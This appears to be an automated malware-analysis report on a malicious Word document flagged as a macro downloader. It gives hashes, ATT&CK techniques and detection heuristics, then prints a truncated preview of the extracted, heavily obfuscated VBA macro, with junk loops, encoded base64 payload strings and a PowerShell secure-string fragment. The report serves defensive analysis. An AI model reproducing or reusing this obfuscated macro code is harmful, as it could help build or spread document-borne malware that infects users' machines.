Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f313d14627e3e79b…

MALICIOUS

Office (OLE)

170.5 KB Created: 2018-03-27 09:47:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 31caaf81d0a3c1b3c9356eb679b6f91c SHA-1: f9eba4cf2d7c05f47816b801f6c00685abb1247e SHA-256: f313d14627e3e79bb4007eb590ef0a8134c329b5e6e86429395a446a0166173a
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV (Doc.Malware.Emodldr-10025032-0) and contains critical heuristics indicating the presence of auto-executing VBA macros (AutoOpen) that use CreateObject to likely download and execute a second-stage payload. The VBA macro code itself is heavily obfuscated, but the presence of the 'macros.bas' artifact and the auto-execution markers strongly suggest a downloader or droppper functionality.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45732 bytes
SHA-256: e50a3d0c57f1d1e0080b0cecff4742fc2b707ed908466398288781720b41e44e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BrDFLszDNdQwl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vrVRATzumvjzbu"
Function CfZijKaRrWbs()
On Error Resume Next
For Each jTGdX In zzhXYZ
      JvEDpP = 51005 - rsCDS
      For Each vkJznF In jjRMHD
         fKCJOa = knzlQ
      Next
   Next
stPMzKTDfdj = YroCp("PQA3ADcAYgA3ADQAYQA3AGYAMgA5ADIAOQBmADYAZABjADQAMQAxAPGL@Sws1", 2, 52)
For Each JoaEZE In DMYZk
      pcMmr = 66455 - ufhqs
      For Each snLzJM In LmrJM
         CwcSmc = ulaYB
      Next
   Next
For Each DvwvA In ZEqliK
      wHHZY = 32922 - znbiq
      For Each CHJjX In iKLPpm
         rBzjEz = oYljj
      Next
   Next
wBTvzi = YroCp("EAGMAMwA5ADkAMABiADIAOQA5ADYAMwAzAGIAOQBjADYAZgAwAGEAZgBkADYAMwA5AGQAZQBkAGYAOABkADIANQAzADcAMQBkADMAYQBlADYAOAAxAGUANQA3ADkAYgAwAGMAMwAwADMAMgBkADIAZQBkAGIAZgAxADkAOQA1ADcANwA4AdNDOl", 2, 177)
For Each owPQUR In cbRuG
      EbMmr = 35460 - jZTwGX
      For Each kjdVZD In pkvvvX
         MPkEZq = fcmtRt
      Next
   Next
For Each LLPFRw In imXTVH
      Jhkvi = 22021 - WdnqA
      For Each qwMsV In BKRBv
         oJpaVL = fdvQZ
      Next
   Next
XOKYuft = YroCp("hifd77BiADUAZAAzADkAMQBmAGUAZQA2ADUAZgA3ADYAYQBkAGMAOQAwADAANQAwAGYAZAA3ADMAMwA2AGYAZgBmAdjm", 7, 83)
For Each Vhbpib In QYFfZ
      zJGwsj = 77491 - uBdvHb
      For Each Vuvhn In AiaUjZ
         iPDKAr = KYfCj
      Next
   Next
For Each ZuEHj In viEOz
      YFfRw = 54721 - mGqVbM
      For Each QvBozs In JOAdWR
         qCtBS = KlqNFb
      Next
   Next
KiIjfJmVZt = YroCp("HDAANgBkADcAYwBmADQAYgA0AGYAOQAyADUAYwAwADEAZABlADAAMwAxAGQAYwAxADcAZgBjADgAOQBhAGQAOAAxADQAYwAxAGUAMwBmADIAOQA2AGYAMwBjAHtDLs", 2, 120)
For Each vNiZc In BsAdPQ
      bPrfn = 53784 - uwDzT
      For Each iTiFn In Wnwwfa
         aPKqY = kLCvuL
      Next
   Next
For Each nLwUt In HuAmY
      kDFHaz = 24292 - XRtEYB
      For Each twQXk In Imiiwd
         aPiOF = EmYYrm
      Next
   Next
aFWhrMGIGwZ = YroCp("bC7bPHKMgB8AGwAYwBIAGsAWQBwv", 8, 19)
For Each HpWRrv In DNwjPn
      bQXZcU = 94333 - Inizb
      For Each PUXZlt In TQQqCl
         NRuwR = cVBzO
      Next
   Next
For Each AJMLQ In XYIVj
      UvrXnf = 31545 - wokIaZ
      For Each DRfwsv In pjuwmZ
         zticG = baFzM
      Next
   Next
WCRoUToITuC = YroCp("I%iLVYgBmADAANgA0ADgAMwBhAGIAMgBiAA=='| CONverTto-SEcUrEstRInG -KE  107,14,255,180,169,48,26,16,200,134,123,115,224,73,153,89,149,125,38,2hmw", 6, 133)
For Each kaLYEl In EUHcWr
      jFLcos = 82640 - wvFfT
      For Each VdLim In LNiHq
         vVCsR = lMcWP
      Next
   Next
For Each NOVibj In IGbjif
      CsswS = 15980 - bUnml
      For Each jiDFR In ZhzUCv
         jQjtui = jaVbU
      Next
   Next
iRQjFOR = YroCp("P.ADQANgAyAGYAYQBhADgANQAyADAANQA4AGMANAA5AGMAOQAxAm@0tEh", 3, 49)
For Each tYmths In iJaDVS
      FWEXp = 3477 - btubtI
      For Each VJMblq In AvEnKF
         XqcXbb = JVwlSm
      Next
   Next
For Each YRQRal In SzjwIC
      fXcXRh = 22596 - OUbBLM
      For Each dBVlh In HwEcr
         tzCWP = rqpIh
      Next
   Next
GlXHDVpOk = YroCp(",ikwwMZA0s", 8, 1)
For Each bUuCvq In aPKWi
      XUnXZX = 89299 - JSfMwM
      For Each UWRUTl In NJFCO
         RJicU = shDSPk
      Next
   Next
For Each jtcmwo In rEJIjc
      shRMbU = 43815 - zIWuLc
      For Each wbDiDi In kLwVP
         khKzjt = BmEzt
      Next
   Next
zHwsibqCHp = YroCp("kMS7V7GIAZQA4AGEAMgBkADIAMAAzADUAZgBmADQAYQBlADgAYgAzAGMAYgBkADkAOQBkADcAYgA2iQJ", 7, 71)
For Each IuUQCc In CHhEB
      rTzFP = 11108 - ZqSzW
      For Each SYoKW In pcafP
         tszvdz = wJBlD
      Next
   Next
For Each koHTi In zjfkmo
      pOGPkR = 11760 - uPhMo
      For Each DNKZa In bMjPzA
         YZdtiB = POMOz
      Next
   Next
cirzwf = YroCp("n%qXzHA4AGYANgA1ADYAYgBlAGUAYwBlADQAZQBkADMAMQd.9", 7, 40)
For Each OFqZaH In ttSULL
      EchrPk = 61006 
... (truncated)